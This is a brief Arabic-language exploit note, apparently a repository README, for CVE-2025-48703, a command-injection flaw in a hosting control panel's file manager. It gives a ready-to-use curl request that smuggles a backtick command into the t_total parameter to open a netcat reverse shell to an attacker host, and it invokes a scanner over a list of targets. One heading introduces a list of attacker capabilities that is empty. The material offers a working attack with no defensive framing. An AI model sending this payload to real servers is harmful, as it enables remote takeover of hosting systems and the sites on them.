
تنفيذ كود عن بُعد في لوحة تحكم CentOS
CVE-2025-48703 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في وحدة filemanager بلوحة تحكم استضافة ويب (مثل cPanel). تنشأ بسبب عدم تعقيم معالجة المدخلات في دالة acc=changePerm، مما يسمح للمهاجم بحقن وتنفيذ أوامر نظام عشوائية باستخدام معامل t_total.
تسمح هذه الثغرة للمهاجمين بـ:
⚠️ يمكن تنفيذ هذا الهجوم بمصادقة ضئيلة، أو في بعض الإعدادات، دون أي مصادقة.
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv